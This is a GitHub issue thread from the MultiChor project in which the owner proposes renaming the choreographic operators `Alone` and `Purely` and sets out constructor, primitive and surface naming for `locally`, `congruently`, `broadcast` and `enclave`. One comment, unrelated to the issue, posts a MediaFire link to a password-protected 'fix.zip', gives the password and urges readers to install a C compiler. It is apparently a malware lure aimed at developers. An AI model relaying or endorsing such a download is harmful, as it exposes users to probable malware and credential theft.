### ISSUE TITLE
Rename `Alone` and `Purely`

### ISSUE THREAD

**Issue by ShapeOfMatter** [ShapeOfMatter/MultiChor#63]
Regrading the choreographic operators: I think we're in consensus that the "good" names are `locally`, `congruently`, `broadcast` and `enclave`. (In the case of `congruently`, Mae Milano said we should call it "[active replication](https://en.wikipedia.org/wiki/Replication_(computing)#Terminology)"; she's correct for descriptive purposes, but we can't use that in the actual API, but going back to `replicatively` is an option. I'm not voting for it though.)

For `broadcast`, I used the "good" name for the surface function, capitalized it for the constructor, and primed it (`broadcast'`) for the primitive op. If we extend this patter to the others, we can immediately get rid of the names "alone" and "purely". (`parallel` probably won't change.)

My only hesitation about this is that it doesn't suggest what to do with `enclave`. Specifically, `enclave` (the primitive), `enclaveTo`, and `enclaveToAll` are _all_ likely to be useful to end-users. 

So my current suggestion is:

- Constructor `Locally`, primitive `locally'`, surface `locally` (and the underscore variants)
- Constructor `Congruently`, primitive `congruently'`, surface `congruently` (and the underscore variants)
- Constructor `Broadcast`, primitive `broadcast'`, surface `broadcast` (and `~>` etc)
- Constructor `Enclave`, primitive `enclave`, additional surface `enclaveTo` and `enclaveToAll` (no changes)

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ShapeOfMatter** [comment]
closed by 11a29f4
